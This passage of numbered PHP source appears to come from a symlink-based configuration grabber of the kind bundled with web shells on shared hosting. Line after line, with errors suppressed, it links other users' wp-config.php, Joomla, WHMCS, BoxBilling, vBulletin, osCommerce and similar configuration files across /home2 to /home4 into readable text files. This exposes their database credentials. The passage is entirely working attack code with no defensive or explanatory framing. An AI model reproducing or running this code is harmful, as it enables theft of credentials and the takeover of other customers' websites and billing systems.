  1847. @symlink('/home2/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1848. @symlink('/home2/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1849. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1850. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1851. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1852. @symlink('/home2/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1853. @symlink('/home2/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1854. @symlink('/home2/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1855. @symlink('/home2/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1856. @symlink('/home2/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1857. @symlink('/home2/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1858. @symlink('/home2/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1859. @symlink('/home2/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1860. @symlink('/home2/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1861. @symlink('/home2/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1862. @symlink('/home2/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1863. @symlink('/home2/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1864. @symlink('/home2/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1865. @symlink('/home2/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1866. @symlink('/home2/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1867. @symlink('/home2/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1868. @symlink('/home2/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1869. @symlink('/home2/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1870. @symlink('/home2/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1871. @symlink('/home2/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1872. @symlink('/home2/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1873. @symlink('/home2/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1874. @symlink('/home2/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1875. @symlink('/home2/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1876. @symlink('/home2/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1877. @symlink('/home2/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1878. @symlink('/home2/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1879. @symlink('/home2/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1880. @symlink('/home2/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1881. @symlink('/home2/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1882. @symlink('/home2/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1883. @symlink('/home2/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1884. @symlink('/home2/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1885. @symlink('/home2/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1886. @symlink('/home2/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1887. @symlink('/home2/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1888. @symlink('/home2/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1889. @symlink('/home2/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1890. @symlink('/home2/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1891. @symlink('/home2/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1892. @symlink('/home2/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1893. @symlink('/home2/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1894. @symlink('/home2/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1895. @symlink('/home2/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1896. @symlink('/home2/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1897. @symlink('/home2/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1898. @symlink('/home2/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1899. @symlink('/home2/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1900. @symlink('/home2/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1901. @symlink('/home2/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1902. @symlink('/home2/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1903.  
  1904. //Home3
  1905.  
  1906. @symlink('/home3/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1907. @symlink('/home3/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1908. @symlink('/home3/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1909. @symlink('/home3/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1910. @symlink('/home3/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1911. @symlink('/home3/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1912. @symlink('/home3/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1913. @symlink('/home3/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1914. @symlink('/home3/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1915. @symlink('/home3/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1916. @symlink('/home3/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1917. @symlink('/home3/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1918. @symlink('/home3/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1919. @symlink('/home3/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1920. @symlink('/home3/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1921. @symlink('/home3/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1922. @symlink('/home3/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1923. @symlink('/home3/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1924. @symlink('/home3/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1925. @symlink('/home3/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1926. @symlink('/home3/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1927. @symlink('/home3/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1928. @symlink('/home3/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1929. @symlink('/home3/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1930. @symlink('/home3/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1931. @symlink('/home3/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1932. @symlink('/home3/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1933. @symlink('/home3/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1934. @symlink('/home3/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1935. @symlink('/home3/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1936. @symlink('/home3/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1937. @symlink('/home3/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1938. @symlink('/home3/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1939. @symlink('/home3/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1940. @symlink('/home3/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1941. @symlink('/home3/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1942. @symlink('/home3/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1943. @symlink('/home3/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1944. @symlink('/home3/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1945. @symlink('/home3/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1946. @symlink('/home3/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1947. @symlink('/home3/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1948. @symlink('/home3/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1949. @symlink('/home3/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1950. @symlink('/home3/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1951. @symlink('/home3/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1952. @symlink('/home3/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1953. @symlink('/home3/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1954. @symlink('/home3/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1955. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1956. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1957. @symlink('/home3/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1958. @symlink('/home3/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1959. @symlink('/home3/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1960. @symlink('/home3/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1961. @symlink('/home3/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1962. @symlink('/home3/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1963. @symlink('/home3/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1964. @symlink('/home3/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1965. @symlink('/home3/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1966. @symlink('/home3/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1967. @symlink('/home3/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1968. @symlink('/home3/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1969. @symlink('/home3/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1970. @symlink('/home3/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1971. @symlink('/home3/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1972. @symlink('/home3/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1973. @symlink('/home3/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1974. @symlink('/home3/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1975. @symlink('/home3/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1976. @symlink('/home3/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1977. @symlink('/home3/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1978. @symlink('/home3/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1979. @symlink('/home3/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1980. @symlink('/home3/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1981. @symlink('/home3/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1982. @symlink('/home3/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1983. @symlink('/home3/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1984. @symlink('/home3/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1985. @symlink('/home3/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1986. @symlink('/home3/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1987. @symlink('/home3/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1988. @symlink('/home3/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1989. @symlink('/home3/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1990. @symlink('/home3/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1991. @symlink('/home3/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1992. @symlink('/home3/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1993. @symlink('/home3/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1994. @symlink('/home3/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1995. @symlink('/home3/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1996. @symlink('/home3/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1997. @symlink('/home3/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1998. @symlink('/home3/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1999. @symlink('/home3/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  2000. @symlink('/home3/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  2001. @symlink('/home3/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  2002. @symlink('/home3/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  2003. @symlink('/home3/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  2004. @symlink('/home3/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  2005. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2006. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2007. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2008. @symlink('/home3/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  2009. @symlink('/home3/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  2010. @symlink('/home3/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  2011. @symlink('/home3/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  2012. @symlink('/home3/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  2013. @symlink('/home3/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  2014. @symlink('/home3/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  2015. @symlink('/home3/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  2016. @symlink('/home3/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  2017. @symlink('/home3/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  2018. @symlink('/home3/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  2019. @symlink('/home3/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  2020. @symlink('/home3/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  2021. @symlink('/home3/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  2022. @symlink('/home3/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  2023. @symlink('/home3/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  2024. @symlink('/home3/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  2025. @symlink('/home3/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  2026. @symlink('/home3/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  2027. @symlink('/home3/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  2028. @symlink('/home3/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  2029. @symlink('/home3/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  2030. @symlink('/home3/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  2031. @symlink('/home3/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  2032. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2033. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2034. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2035. @symlink('/home3/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  2036. @symlink('/home3/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  2037. @symlink('/home3/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  2038. @symlink('/home3/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  2039. @symlink('/home3/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  2040. @symlink('/home3/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  2041. @symlink('/home3/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  2042. @symlink('/home3/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  2043. @symlink('/home3/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  2044. @symlink('/home3/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  2045. @symlink('/home3/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  2046. @symlink('/home3/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  2047. @symlink('/home3/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  2048. @symlink('/home3/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  2049. @symlink('/home3/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  2050. @symlink('/home3/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  2051. @symlink('/home3/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  2052. @symlink('/home3/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  2053. @symlink('/home3/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  2054. @symlink('/home3/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  2055. @symlink('/home3/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  2056. @symlink('/home3/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  2057. @symlink('/home3/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  2058. @symlink('/home3/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  2059. @symlink('/home3/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  2060. @symlink('/home3/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  2061. @symlink('/home3/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  2062. @symlink('/home3/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  2063. @symlink('/home3/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  2064. @symlink('/home3/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  2065. @symlink('/home3/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  2066. @symlink('/home3/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  2067. @symlink('/home3/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  2068. @symlink('/home3/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  2069. @symlink('/home3/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  2070. @symlink('/home3/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  2071. @symlink('/home3/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  2072. @symlink('/home3/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  2073. @symlink('/home3/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  2074. @symlink('/home3/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  2075. @symlink('/home3/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  2076. @symlink('/home3/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2077. @symlink('/home3/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  2078. @symlink('/home3/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  2079. @symlink('/home3/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  2080. @symlink('/home3/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  2081. @symlink('/home3/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  2082. @symlink('/home3/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  2083. @symlink('/home3/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  2084. @symlink('/home3/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  2085. @symlink('/home3/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2086.  
  2087. //Home4
  2088.  
  2089. @symlink('/home4/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  2090. @symlink('/home4/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  2091. @symlink('/home4/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  2092. @symlink('/home4/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  2093. @symlink('/home4/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  2094. @symlink('/home4/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  2095. @symlink('/home4/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  2096. @symlink('/home4/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  2097. @symlink('/home4/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  2098. @symlink('/home4/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  2099. @symlink('/home4/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  2100. @symlink('/home4/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  2101. @symlink('/home4/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  2102. @symlink('/home4/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  2103. @symlink('/home4/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  2104. @symlink('/home4/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  2105. @symlink('/home4/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  2106. @symlink('/home4/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  2107. @symlink('/home4/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  2108. @symlink('/home4/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  2109. @symlink('/home4/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  2110. @symlink('/home4/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  2111. @symlink('/home4/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  2112. @symlink('/home4/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  2113. @symlink('/home4/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  2114. @symlink('/home4/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  2115. @symlink('/home4/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  2116. @symlink('/home4/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  2117. @symlink('/home4/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  2118. @symlink('/home4/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  2119. @symlink('/home4/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  2120. @symlink('/home4/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  2121. @symlink('/home4/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  2122. @symlink('/home4/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  2123. @symlink('/home4/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  2124. @symlink('/home4/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  2125. @symlink('/home4/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  2126. @symlink('/home4/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  2127. @symlink('/home4/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  2128. @symlink('/home4/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  2129. @symlink('/home4/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  2130. @symlink('/home4/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  2131. @symlink('/home4/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  2132. @symlink('/home4/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  2133. @symlink('/home4/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  2134. @symlink('/home4/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  2135. @symlink('/home4/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  2136. @symlink('/home4/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  2137. @symlink('/home4/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  2138. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2139. @symlink('/home4/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2140. @symlink('/home4/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  2141. @symlink('/home4/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  2142. @symlink('/home4/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  2143. @symlink('/home4/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  2144. @symlink('/home4/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  2145. @symlink('/home4/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  2146. @symlink('/home4/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  2147. @symlink('/home4/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  2148. @symlink('/home4/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  2149. @symlink('/home4/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  2150. @symlink('/home4/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  2151. @symlink('/home4/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  2152. @symlink('/home4/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  2153. @symlink('/home4/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  2154. @symlink('/home4/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
